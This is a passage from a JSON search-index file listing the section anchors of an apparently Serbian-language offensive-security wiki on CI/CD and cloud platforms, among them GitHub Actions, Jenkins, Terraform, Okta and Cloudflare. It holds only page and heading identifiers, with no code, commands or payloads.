{"doc_urls":["index.html#hacktricks-cloud","index.html#pokrenite-hacktricks-cloud-lokalno","index.html#pentesting-cicd-metodologija","index.html#pentesting-cloud-metodologija","index.html#licenca--odricanje","index.html#github-statistika","pentesting-ci-cd/pentesting-ci-cd-methodology.html#pentesting-cicd-metodologija","pentesting-ci-cd/pentesting-ci-cd-methodology.html#vcs","pentesting-ci-cd/pentesting-ci-cd-methodology.html#cicd-pipelines","pentesting-ci-cd/pentesting-ci-cd-methodology.html#vcs-pentesting-metodologija","pentesting-ci-cd/pentesting-ci-cd-methodology.html#pipelines-pentesting-metodologija","pentesting-ci-cd/pentesting-ci-cd-methodology.html#ppe---izvršenje-zagađenog-pipeline-a","pentesting-ci-cd/pentesting-ci-cd-methodology.html#prednosti-eksploatacije","pentesting-ci-cd/pentesting-ci-cd-methodology.html#više-relevantnih-informacija","pentesting-ci-cd/pentesting-ci-cd-methodology.html#alati--cis-benchmark","pentesting-ci-cd/pentesting-ci-cd-methodology.html#top-10-cicd-bezbednosnih-rizika","pentesting-ci-cd/pentesting-ci-cd-methodology.html#laboratorije","pentesting-ci-cd/pentesting-ci-cd-methodology.html#automatski-alati","pentesting-ci-cd/pentesting-ci-cd-methodology.html#reference","pentesting-ci-cd/github-security/index.html#github-security","pentesting-ci-cd/github-security/index.html#Šta-je-github","pentesting-ci-cd/github-security/index.html#osnovne-informacije","pentesting-ci-cd/github-security/index.html#spoljna-rekognosciranja","pentesting-ci-cd/github-security/index.html#github-dorks","pentesting-ci-cd/github-security/index.html#github-curenja","pentesting-ci-cd/github-security/index.html#spoljni-forkovi","pentesting-ci-cd/github-security/index.html#github-curenja-u-obrisaniminternim-forkovima","pentesting-ci-cd/github-security/index.html#ojačavanje-organizacije","pentesting-ci-cd/github-security/index.html#privilegije-članova","pentesting-ci-cd/github-security/index.html#podešavanja-akcija","pentesting-ci-cd/github-security/index.html#integracije","pentesting-ci-cd/github-security/index.html#rekognosciranje-i-napadi-zloupotrebom-kredencijala","pentesting-ci-cd/github-security/index.html#sa-korisničkim-kredencijalima","pentesting-ci-cd/github-security/index.html#sa-korisničkim-ssh-ključem","pentesting-ci-cd/github-security/index.html#sa-korisničkim-tokenom","pentesting-ci-cd/github-security/index.html#sa-oauth-aplikacijom","pentesting-ci-cd/github-security/index.html#sa-github-aplikacijom","pentesting-ci-cd/github-security/index.html#kompromitovanje-i-zloupotreba-github-akcije","pentesting-ci-cd/github-security/index.html#zaobilaženje-zaštite-grane","pentesting-ci-cd/github-security/index.html#zaobilaženje-zaštita-okruženja","pentesting-ci-cd/github-security/index.html#persistencija","pentesting-ci-cd/github-security/index.html#impostor-commit-ovi---bekdoor-putem-repo-commit-ova","pentesting-ci-cd/github-security/abusing-github-actions/index.html#abusing-github-actions","pentesting-ci-cd/github-security/abusing-github-actions/index.html#basic-information","pentesting-ci-cd/github-security/abusing-github-actions/index.html#impacts-summary","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github_token","pentesting-ci-cd/github-security/abusing-github-actions/index.html#dozvoljena-izvršenja","pentesting-ci-cd/github-security/abusing-github-actions/index.html#izvršenje-iz-kreiranja-repozitorijuma","pentesting-ci-cd/github-security/abusing-github-actions/index.html#izvršenje-iz-nove-grane","pentesting-ci-cd/github-security/abusing-github-actions/index.html#forked-execution","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pull_request","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pull_request_target","pentesting-ci-cd/github-security/abusing-github-actions/index.html#workflow_run","pentesting-ci-cd/github-security/abusing-github-actions/index.html#workflow_call","pentesting-ci-cd/github-security/abusing-github-actions/index.html#zloupotreba-forkovane-izvršavanja","pentesting-ci-cd/github-security/abusing-github-actions/index.html#nepouzdan-checkout-izvršavanje","pentesting-ci-cd/github-security/abusing-github-actions/index.html#kontekst-injekcije-skripti","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github_env-injekcija-skripti","pentesting-ci-cd/github-security/abusing-github-actions/index.html#ranjive-treće-strane-github-akcije","pentesting-ci-cd/github-security/abusing-github-actions/index.html#drugi-spoljni-pristup","pentesting-ci-cd/github-security/abusing-github-actions/index.html#otimanje-izbrisanog-namespace-repozitorijuma","pentesting-ci-cd/github-security/abusing-github-actions/index.html#repo-pivoting","pentesting-ci-cd/github-security/abusing-github-actions/index.html#trovanje-keša","pentesting-ci-cd/github-security/abusing-github-actions/index.html#trovanje-artefakata","pentesting-ci-cd/github-security/abusing-github-actions/index.html#post-eksploatacija-iz-akcije","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pristupanje-aws-i-gcp-putem-oidc","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pristupanje-tajnama","pentesting-ci-cd/github-security/abusing-github-actions/index.html#zloupotreba-samostalno-hostovanih-izvršitelja","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github-docker-images-registry","pentesting-ci-cd/github-security/abusing-github-actions/index.html#osetljive-informacije-u-github-actions-logovima","pentesting-ci-cd/github-security/abusing-github-actions/index.html#sakrivanje-tragova","pentesting-ci-cd/github-security/abusing-github-actions/index.html#alati","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.html#gh-actions---zagađenje-artefakata","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.html#gh-actions---zagađenje-keša","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.html#gh-actions---injekcije-skripti-u-kontekstu","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#pristupačni-obbrisani-podaci-na-githubu","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#pristup-obbrisanom-fork-podacima","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#pristup-obbrisanom-repo-podacima","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#pristup-privatnim-repo-podacima","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#kako-otkriti-komite-iz-obrisanihskrivenih-forka","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#direktan-pristup-komitu","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#brute-forcing-kratkih-sha-1-vrednosti","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#reference","pentesting-ci-cd/github-security/basic-github-information.html#osnovne-informacije-o-github-u","pentesting-ci-cd/github-security/basic-github-information.html#osnovna-struktura","pentesting-ci-cd/github-security/basic-github-information.html#privilegije","pentesting-ci-cd/github-security/basic-github-information.html#uloge-u-preduzeću","pentesting-ci-cd/github-security/basic-github-information.html#uloge-u-organizaciji","pentesting-ci-cd/github-security/basic-github-information.html#privilegije-članova","pentesting-ci-cd/github-security/basic-github-information.html#uloge-u-repozitorijumu","pentesting-ci-cd/github-security/basic-github-information.html#timovi","pentesting-ci-cd/github-security/basic-github-information.html#korisnici","pentesting-ci-cd/github-security/basic-github-information.html#github-autentifikacija","pentesting-ci-cd/github-security/basic-github-information.html#web-pristup","pentesting-ci-cd/github-security/basic-github-information.html#ssh-ključevi","pentesting-ci-cd/github-security/basic-github-information.html#lični-pristupni-tokeni","pentesting-ci-cd/github-security/basic-github-information.html#oauth-aplikacije","pentesting-ci-cd/github-security/basic-github-information.html#github-aplikacije","pentesting-ci-cd/github-security/basic-github-information.html#github-actions","pentesting-ci-cd/github-security/basic-github-information.html#git-akcije","pentesting-ci-cd/github-security/basic-github-information.html#konfiguracija","pentesting-ci-cd/github-security/basic-github-information.html#git-tajne","pentesting-ci-cd/github-security/basic-github-information.html#git-okruženja","pentesting-ci-cd/github-security/basic-github-information.html#git-action-runner","pentesting-ci-cd/github-security/basic-github-information.html#git-action-compromise","pentesting-ci-cd/github-security/basic-github-information.html#branch-protections","pentesting-ci-cd/github-security/basic-github-information.html#references","pentesting-ci-cd/gitea-security/index.html#gitea-security","pentesting-ci-cd/gitea-security/index.html#Šta-je-gitea","pentesting-ci-cd/gitea-security/index.html#osnovne-informacije","pentesting-ci-cd/gitea-security/index.html#laboratorija","pentesting-ci-cd/gitea-security/index.html#neautentifikovana-enumeracija","pentesting-ci-cd/gitea-security/index.html#interna-eksploatacija","pentesting-ci-cd/gitea-security/index.html#sa-korisničkim-akreditivimaweb-kolačićem","pentesting-ci-cd/gitea-security/index.html#sa-korisničkim-ssh-ključem","pentesting-ci-cd/gitea-security/index.html#sa-korisničkim-tokenom","pentesting-ci-cd/gitea-security/index.html#sa-oauth-aplikacijom","pentesting-ci-cd/gitea-security/index.html#zaobilaženje-zaštite-grane","pentesting-ci-cd/gitea-security/index.html#enumeracija-webhook-ova","pentesting-ci-cd/gitea-security/index.html#post-eksploatacija","pentesting-ci-cd/gitea-security/index.html#unutar-servera","pentesting-ci-cd/gitea-security/basic-gitea-information.html#osnovne-gitea-informacije","pentesting-ci-cd/gitea-security/basic-gitea-information.html#osnovna-struktura","pentesting-ci-cd/gitea-security/basic-gitea-information.html#dozvole","pentesting-ci-cd/gitea-security/basic-gitea-information.html#organizacije","pentesting-ci-cd/gitea-security/basic-gitea-information.html#timovi--korisnici","pentesting-ci-cd/gitea-security/basic-gitea-information.html#gitea-autentifikacija","pentesting-ci-cd/gitea-security/basic-gitea-information.html#web-pristup","pentesting-ci-cd/gitea-security/basic-gitea-information.html#ssh-ključevi","pentesting-ci-cd/gitea-security/basic-gitea-information.html#lični-pristupni-tokeni","pentesting-ci-cd/gitea-security/basic-gitea-information.html#oauth-aplikacije","pentesting-ci-cd/gitea-security/basic-gitea-information.html#ključevi-za-implementaciju","pentesting-ci-cd/gitea-security/basic-gitea-information.html#zaštite-grana","pentesting-ci-cd/concourse-security/index.html#concourse-security","pentesting-ci-cd/concourse-security/index.html#osnovne-informacije","pentesting-ci-cd/concourse-security/index.html#arhitektura-concourse-a","pentesting-ci-cd/concourse-security/index.html#concourse-lab","pentesting-ci-cd/concourse-security/index.html#enumeracija-i-napad-na-concourse","pentesting-ci-cd/concourse-security/concourse-architecture.html#concourse-arhitektura","pentesting-ci-cd/concourse-security/concourse-architecture.html#concourse-arhitektura-1","pentesting-ci-cd/concourse-security/concourse-architecture.html#arhitektura","pentesting-ci-cd/concourse-security/concourse-architecture.html#reference","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#concourse-lab-creation","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#testing-environment","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#running-concourse","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#kreirajte-pipeline","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#koraci","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#jednostavan-primer-pipeline-a","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#bash-skripta-sa-izlazomulazom-pipeline-a","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#okidači","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeration--attacks","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeration--attacks-1","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#user-roles--permissions","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#vars--credential-manager","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeracija","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-napadi","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#reference","pentesting-ci-cd/circleci-security.html#circleci-security","pentesting-ci-cd/circleci-security.html#basic-information","pentesting-ci-cd/circleci-security.html#permissions","pentesting-ci-cd/circleci-security.html#env-variables--secrets","pentesting-ci-cd/circleci-security.html#napadi","pentesting-ci-cd/travisci-security/index.html#travisci-security","pentesting-ci-cd/travisci-security/index.html#Šta-je-travisci","pentesting-ci-cd/travisci-security/index.html#napadi","pentesting-ci-cd/travisci-security/index.html#okidači","pentesting-ci-cd/travisci-security/index.html#pr-treće-strane","pentesting-ci-cd/travisci-security/index.html#ispumpavanje-tajni","pentesting-ci-cd/travisci-security/index.html#todo","pentesting-ci-cd/travisci-security/index.html#travisci-enterprise","pentesting-ci-cd/travisci-security/index.html#reference","pentesting-ci-cd/travisci-security/basic-travisci-information.html#osnovne-informacije-o-travisci","pentesting-ci-cd/travisci-security/basic-travisci-information.html#pristup","pentesting-ci-cd/travisci-security/basic-travisci-information.html#enkriptovane-tajne","pentesting-ci-cd/travisci-security/basic-travisci-information.html#promenljive-okruženja","pentesting-ci-cd/travisci-security/basic-travisci-information.html#prilagođene-enkriptovane-tajne","pentesting-ci-cd/travisci-security/basic-travisci-information.html#prilagođene-enkriptovane-datoteke","pentesting-ci-cd/travisci-security/basic-travisci-information.html#travisci-enterprise","pentesting-ci-cd/jenkins-security/index.html#jenkins-security","pentesting-ci-cd/jenkins-security/index.html#osnovne-informacije","pentesting-ci-cd/jenkins-security/index.html#neautentifikovana-enumeracija","pentesting-ci-cd/jenkins-security/index.html#poznate-ranjivosti","pentesting-ci-cd/jenkins-security/index.html#prijava","pentesting-ci-cd/jenkins-security/index.html#registracija","pentesting-ci-cd/jenkins-security/index.html#sso-prijava","pentesting-ci-cd/jenkins-security/index.html#bruteforce","pentesting-ci-cd/jenkins-security/index.html#password-spraying","pentesting-ci-cd/jenkins-security/index.html#ip-whitelisting-bypass","pentesting-ci-cd/jenkins-security/index.html#internal-jenkins-abuses","pentesting-ci-cd/jenkins-security/index.html#listing-users","pentesting-ci-cd/jenkins-security/index.html#dumping-builds-to-find-cleartext-secrets","pentesting-ci-cd/jenkins-security/index.html#krađa-ssh-kredencijala","pentesting-ci-cd/jenkins-security/index.html#rce-u-jenkins-u","pentesting-ci-cd/jenkins-security/index.html#rce-kreiranjemodifikovanje-projekta","pentesting-ci-cd/jenkins-security/index.html#rce-izvršavanje-groovy-skripte","pentesting-ci-cd/jenkins-security/index.html#rce-kreiranjemodifikovanje-pipeline-a","pentesting-ci-cd/jenkins-security/index.html#eksploatacija-pipeline-a","pentesting-ci-cd/jenkins-security/index.html#build-pipeline-i","pentesting-ci-cd/jenkins-security/index.html#pipeline-rce","pentesting-ci-cd/jenkins-security/index.html#proveravanje-env-varijabli","pentesting-ci-cd/jenkins-security/index.html#dumping-secrets","pentesting-ci-cd/jenkins-security/index.html#okidači","pentesting-ci-cd/jenkins-security/index.html#Čvorovi-i-agenti","pentesting-ci-cd/jenkins-security/index.html#potpuni-primer","pentesting-ci-cd/jenkins-security/index.html#pročitajte-proizvoljnu-datoteku-do-rce","pentesting-ci-cd/jenkins-security/index.html#rce","pentesting-ci-cd/jenkins-security/index.html#post-eksploatacija","pentesting-ci-cd/jenkins-security/index.html#metasploit","pentesting-ci-cd/jenkins-security/index.html#jenkins-tajne","pentesting-ci-cd/jenkins-security/index.html#kreirajte-novog-admin-korisnika","pentesting-ci-cd/jenkins-security/index.html#reference","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#osnovne-informacije-o-jenkinsu","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#pristup","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#korisničko-ime--lozinka","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#kolačić","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#ssopluginovi","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#tokeni","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#ssh-ključevi","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#autorizacija","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#sigurnosno-carstvo","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#jenkins-Čvorovi-agenti-i-izvršioci","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#jenkins-tajne","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#enkripcija-tajni-i-akreditiva","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#pristup-akreditivima","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#reference","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#jenkins-rce-sa-groovy-skriptom","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#jenkins-rce-sa-groovy-skriptom-1","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#obrnuta-ljuska-u-linuxu","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#Обратна-љуска-у-Виндовс","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#Скрипт","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#jenkins-rce-kreiranjemodifikovanje-projekta","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#kreiranje-projekta","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#modifikovanje-projekta","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#izvršenje","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#jenkins-rce-kreiranjemodifikovanje-pipelines","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#kreiranje-novog-pipelines","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#modifikovanje-pipeline-a","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#jenkins-arbitrary-file-read-to-rce-via-remember-me","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#attack-prerequisites","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#detailed-exploitation-process","pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.html#jenkins-dumping-secrets-from-groovy","pentesting-ci-cd/apache-airflow-security/index.html#apache-airflow-security","pentesting-ci-cd/apache-airflow-security/index.html#osnovne-informacije","pentesting-ci-cd/apache-airflow-security/index.html#lokalni-laboratorija","pentesting-ci-cd/apache-airflow-security/index.html#konfiguracija-airflow-a","pentesting-ci-cd/apache-airflow-security/index.html#airflow-rbac","pentesting-ci-cd/apache-airflow-security/index.html#napadi","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#konfiguracija-airflow-a","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#konfiguracioni-fajl","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#api","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#atlas","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#celery","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#core","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#dask","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#kerberos","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#logging","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#secrets","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#smtp","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#webserver","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#web-autentifikacija","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#airflow-rbac","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#rbac","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#default-permissions","pentesting-ci-cd/terraform-security.html#terraform-security","pentesting-ci-cd/terraform-security.html#osnovne-informacije","pentesting-ci-cd/terraform-security.html#terraform-laboratorija","pentesting-ci-cd/terraform-security.html#rce-u-terraformu-trovanje-konfiguracionih-datoteka","pentesting-ci-cd/terraform-security.html#terraform-plan","pentesting-ci-cd/terraform-security.html#terraform-apply","pentesting-ci-cd/terraform-security.html#izvori-tajni","pentesting-ci-cd/terraform-security.html#zloupotreba-terraform-state-fajlova","pentesting-ci-cd/terraform-security.html#rce-u-terraform-u-trovanje-konfiguracionog-fajla","pentesting-ci-cd/terraform-security.html#brisanje-resursa","pentesting-ci-cd/terraform-security.html#zamenite-crnu-listu-provajdera","pentesting-ci-cd/terraform-security.html#automatski-alati-za-reviziju","pentesting-ci-cd/terraform-security.html#snyk-infrastructure-as-code-iac","pentesting-ci-cd/terraform-security.html#checkov","pentesting-ci-cd/terraform-security.html#terraform-compliance","pentesting-ci-cd/terraform-security.html#tfsec","pentesting-ci-cd/terraform-security.html#kicks","pentesting-ci-cd/terraform-security.html#terrascan","pentesting-ci-cd/terraform-security.html#reference","pentesting-ci-cd/atlantis-security.html#atlantis-security","pentesting-ci-cd/atlantis-security.html#basic-information","pentesting-ci-cd/atlantis-security.html#local-lab","pentesting-ci-cd/atlantis-security.html#atlantis-access","pentesting-ci-cd/atlantis-security.html#server-configuration","pentesting-ci-cd/atlantis-security.html#atlantis-commands","pentesting-ci-cd/atlantis-security.html#napadi","pentesting-ci-cd/atlantis-security.html#post-exploitation","pentesting-ci-cd/atlantis-security.html#mitigations","pentesting-ci-cd/atlantis-security.html#references","pentesting-ci-cd/cloudflare-security/index.html#cloudflare-security","pentesting-ci-cd/cloudflare-security/index.html#websites","pentesting-ci-cd/cloudflare-security/index.html#domain-registration","pentesting-ci-cd/cloudflare-security/index.html#analytics","pentesting-ci-cd/cloudflare-security/index.html#pages","pentesting-ci-cd/cloudflare-security/index.html#workers","pentesting-ci-cd/cloudflare-security/index.html#r2","pentesting-ci-cd/cloudflare-security/index.html#stream","pentesting-ci-cd/cloudflare-security/index.html#images","pentesting-ci-cd/cloudflare-security/index.html#security-center","pentesting-ci-cd/cloudflare-security/index.html#turnstile","pentesting-ci-cd/cloudflare-security/index.html#zero-trust","pentesting-ci-cd/cloudflare-security/index.html#bulk-redirects","pentesting-ci-cd/cloudflare-security/index.html#notifications","pentesting-ci-cd/cloudflare-security/index.html#manage-account","pentesting-ci-cd/cloudflare-security/index.html#ddos-investigation","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#cloudflare-domains","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#pregled","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#analitika","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#dns","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#email","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#spectrum","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#ssltls","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#sigurnost","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#pristup","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#brzina","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#keširanje","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#workers-rute","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#pravila","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#mreža","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#saobraćaj","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#prilagođene-stranice","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#aplikacije","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#scrape-shield","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#zaraz","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#web3","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#cloudflare-zero-trust-network","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#analytics","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#gateway","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#access","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#my-team","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#logs","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#settings","pentesting-ci-cd/okta-security/index.html#okta-security","pentesting-ci-cd/okta-security/index.html#osnovne-informacije","pentesting-ci-cd/okta-security/index.html#sažetak","pentesting-ci-cd/okta-security/index.html#napadi","pentesting-ci-cd/okta-security/index.html#lociranje-okta-portala","pentesting-ci-cd/okta-security/index.html#prijava-u-okta-putem-kerberosa","pentesting-ci-cd/okta-security/index.html#otimanje-okta-ad-agenta","pentesting-ci-cd/okta-security/index.html#otimanje-ad-kao-administrator","pentesting-ci-cd/okta-security/index.html#lažni-okta-saml-provajder","pentesting-ci-cd/okta-security/index.html#phishing-okta-portala-sa-evilgnix","pentesting-ci-cd/okta-security/index.html#napad-impersonacije-kolege","pentesting-ci-cd/okta-security/index.html#izbegavanje-politika-detekcije-ponašanja","pentesting-ci-cd/okta-security/index.html#okta-jačanje","pentesting-ci-cd/okta-security/index.html#reference","pentesting-ci-cd/okta-security/okta-hardening.html#okta-hardening","pentesting-ci-cd/okta-security/okta-hardening.html#directory","pentesting-ci-cd/okta-security/okta-hardening.html#people","pentesting-ci-cd/okta-security/okta-hardening.html#groups","pentesting-ci-cd/okta-security/okta-hardening.html#devices","pentesting-ci-cd/okta-security/okta-hardening.html#profile-editor","pentesting-ci-cd/okta-security/okta-hardening.html#directory-integrations","pentesting-ci-cd/okta-security/okta-hardening.html#profile-sources","pentesting-ci-cd/okta-security/okta-hardening.html#customizations","pentesting-ci-cd/okta-security/okta-hardening.html#brands","pentesting-ci-cd/okta-security/okta-hardening.html#sms","pentesting-ci-cd/okta-security/okta-hardening.html#end-user-dashboard","pentesting-ci-cd/okta-security/okta-hardening.html#other","pentesting-ci-cd/okta-security/okta-hardening.html#applications","pentesting-ci-cd/okta-security/okta-hardening.html#applications-1","pentesting-ci-cd/okta-security/okta-hardening.html#identity-governance","pentesting-ci-cd/okta-security/okta-hardening.html#access-certifications","pentesting-ci-cd/okta-security/okta-hardening.html#security","pentesting-ci-cd/okta-security/okta-hardening.html#general","pentesting-ci-cd/okta-security/okta-hardening.html#healthinsight","pentesting-ci-cd/okta-security/okta-hardening.html#authenticators","pentesting-ci-cd/okta-security/okta-hardening.html#authentication-policies","pentesting-ci-cd/okta-security/okta-hardening.html#global-session-policy","pentesting-ci-cd/okta-security/okta-hardening.html#identity-providers","pentesting-ci-cd/okta-security/okta-hardening.html#delegated-authentication","pentesting-ci-cd/okta-security/okta-hardening.html#network","pentesting-ci-cd/okta-security/okta-hardening.html#device-integrations","pentesting-ci-cd/okta-security/okta-hardening.html#api","pentesting-ci-cd/okta-security/okta-hardening.html#workflow","pentesting-ci-cd/okta-security/okta-hardening.html#automations","pentesting-ci-cd/okta-security/okta-hardening.html#reports","pentesting-ci-cd/okta-security/okta-hardening.html#reports-1","pentesting-ci-cd/okta-security/okta-hardening.html#system-log","pentesting-ci-cd/okta-security/okta-hardening.html#import-monitoring","pentesting-ci-cd/okta-security/okta-hardening.html#rate-limits","pentesting-ci-cd/okta-security/okta-hardening.html#settings","pentesting-ci-cd/okta-security/okta-hardening.html#account","pentesting-ci-cd/okta-security/okta-hardening.html#downloads","pentesting-ci-cd/serverless.com-security.html#serverlesscom-security","pentesting-ci-cd/serverless.com-security.html#osnovne-informacije","pentesting-ci-cd/serverless.com-security.html#organizacija","pentesting-ci-cd/serverless.com-security.html#tim","pentesting-ci-cd/serverless.com-security.html#aplikacija","pentesting-ci-cd/serverless.com-security.html#usluge","pentesting-ci-cd/serverless.com-security.html#tutorial","pentesting-ci-cd/serverless.com-security.html#bezbednosna-provera-serverlesscom","pentesting-ci-cd/serverless.com-security.html#pogrešno-konfigurisane-iam-uloge-i-dozvole","pentesting-ci-cd/serverless.com-security.html#nepouzdane-tajne-i-upravljanje-konfiguracijom","pentesting-ci-cd/serverless.com-security.html#ranljiv-kod-i-zavisnosti","pentesting-ci-cd/serverless.com-security.html#neadekvatno-logovanje-i-nadgledanje","pentesting-ci-cd/serverless.com-security.html#nesigurne-konfiguracije-api-gateway-a","pentesting-ci-cd/serverless.com-security.html#nedovoljna-izolacija-funkcija","pentesting-ci-cd/serverless.com-security.html#nedovoljna-zaštita-podataka","pentesting-ci-cd/serverless.com-security.html#nedostatak-pravilnog-rukovanja-greškama","pentesting-ci-cd/serverless.com-security.html#nesigurne-prakse-implementacije","pentesting-ci-cd/serverless.com-security.html#ranjivosti-u-dodacima-i-ekstenzijama","pentesting-ci-cd/serverless.com-security.html#izloženost-osetljivih-krajnjih-tačaka","pentesting-ci-cd/serverless.com-security.html#prekomerne-dozvole-za-članove-tima-i-spoljne-saradnike","pentesting-ci-cd/serverless.com-security.html#bezbednost-pristupnih-ključeva-i-licenci","pentesting-ci-cd/supabase-security.html#supabase-security","pentesting-ci-cd/supabase-security.html#osnovne-informacije","pentesting-ci-cd/supabase-security.html#poddomen","pentesting-ci-cd/supabase-security.html#konfiguracija-baze-podataka","pentesting-ci-cd/supabase-security.html#konfiguracija-api-ja","pentesting-ci-cd/supabase-security.html#anon-api-ključevi","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#ansible-tower--awx--automation-controller-security","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#osnovne-informacije","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#razlike","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#tehnološki-stack","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#logičke-komponente","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#tok-izvršenja-poslova","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#kreiranje-awx-laboratorije-za-testiranje","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#rbac","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#podržane-uloge","pentesting-ci-cd/vercel-security.html#vercel","pentesting-ci-cd/vercel-security.html#osnovne-informacije","pentesting-ci-cd/vercel-security.html#podešavanja-projekta","pentesting-ci-cd/vercel-security.html#opšte","pentesting-ci-cd/vercel-security.html#domeni","pentesting-ci-cd/vercel-security.html#okruženja","pentesting-ci-cd/vercel-security.html#varijable-okruženja","pentesting-ci-cd/vercel-secur